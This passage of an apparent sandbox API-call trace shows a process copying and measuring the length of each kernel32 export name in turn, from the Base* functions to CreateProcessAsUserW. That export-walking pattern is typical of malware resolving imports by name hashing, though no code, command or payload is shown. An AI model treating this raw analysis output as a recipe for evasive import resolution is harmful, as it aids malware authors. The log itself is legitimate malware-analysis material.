returned="BaseInitAppcompatCacheSupport" [0083.653] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.653] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.653] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.653] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.653] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.653] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.653] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.653] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.653] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.653] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.653] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.653] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.653] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.654] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.654] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.654] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.654] lstrlenA (lpString="BEEP") returned 4 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.654] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.654] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.654] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.654] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.654] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.654] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.654] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.654] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.654] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.654] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.654] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.654] lstrlenA (lpString="CANCELIO") returned 8 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.654] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.654] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.654] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.655] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.655] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.655] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.655] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.655] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.655] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.655] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.655] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.655] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.655] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.655] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.655] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.655] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.655] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.655] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.655] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.655] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.655] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.655] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.655] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.656] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.656] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.656] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.656] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.656] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.656] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.656] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.656] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.656] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.656] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.656] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.656] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.656] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.656] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.656] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.656] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.656] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.656] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.656] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.657] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.657] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.657] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.657] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.657] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.657] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.657] lstrlenA (lpString="COPYFILEA") returned 9 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.657] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.657] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.657] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.657] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.657] lstrlenA (lpString="COPYFILEW") returned 9 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.657] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.657] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.657] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.657] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.657] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.657] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.657] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.657] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.658] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.658] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.658] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.658] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.658] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.658] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.658] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.658] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.658] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.658] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.658] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.658] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.658] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.658] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.658] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.658] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.658] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.658] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.658] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.659] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.659] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.659] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.659] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.659] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.659] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.659] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.659] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.659] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.659] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.659] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.659] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.659] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.659] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.659] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.659] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.659] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.659] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.659] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.660] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.660] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.660] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.660] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.660] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.660] lstrcpyA (in: 